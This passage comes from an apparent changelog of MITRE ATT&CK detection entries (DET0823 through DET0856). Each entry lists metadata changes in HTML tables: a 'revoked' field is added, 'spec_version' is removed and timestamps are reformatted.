collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0823] Detection of Phishing for Information</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0081] Detection of Proxy Execution via Trusted Signed Binaries Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0445] Detection of Proxy Infrastructure Setup and Traffic Bridging</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0880] Detection of Purchase Technical Data</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0919] Detection of Query Public AI Services</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T14:59:37.388Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 14:59:37.388000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:23:56.287Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.391000+00:00</td></tr></tbody></table></details><hr><h4>[DET0209] Detection of Registry Query for Environmental Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0071] Detection of Remote Data Staging Prior to Exfiltration</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0079] Detection of Remote Service Session Hijacking</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0588] Detection of Remote Service Session Hijacking for RDP.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:26:25.154Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0881] Detection of SEO Poisoning</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0858] Detection of Scan Databases</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0817] Detection of Scanning IP Blocks</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0466] Detection of Script-Based Proxy Execution via Signed Microsoft Utilities</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0822] Detection of Search Closed Sources</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0811] Detection of Search Engines</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0860] Detection of Search Open Technical Databases</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0856] Detection of Search Open Websites/Domains</h4><p><b>Current version</b>: 